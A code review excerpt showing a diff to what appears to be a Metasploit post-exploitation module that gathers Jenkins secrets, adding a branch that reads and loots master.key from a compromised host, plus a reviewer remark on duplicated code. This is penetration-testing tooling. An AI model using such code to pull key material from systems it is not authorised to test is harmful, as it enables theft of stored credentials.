modules/post/multi/gather/jenkins_gather.rb

```diff
@@ -311,6 +326,16 @@ def get_key_material(home, platform)
         loot_path = store_loot('hudson.util.secret', 'application/octet-stream', session, @hudson_secret_key)
         vprint_status("File hudson.util.Secret saved to #{loot_path}")
       end
+    # Newer versions of Jenkins do not create `hudson.util.Secret` until credentials have been added via Jenkins client
+    # tested on versions 2.401.1, 2.346.3
+    elsif exists?(master_key_path) && !exists?(hudson_secret_key_path)
+      @master_key = read_file(master_key_path)
+
+      if datastore['STORE_LOOT']
+        loot_path = store_loot('master.key', 'application/octet-stream', session, @master_key)
+        vprint_status("File master.key saved to #{loot_path}")
+        vprint_status('No credentials found that required decrypting')
+      end
```

Comment:
There is significant overlap here with the section above, duplication of storing the master key to loot, the only difference between the two sections is not storing the hudson secret key when it doesn't exist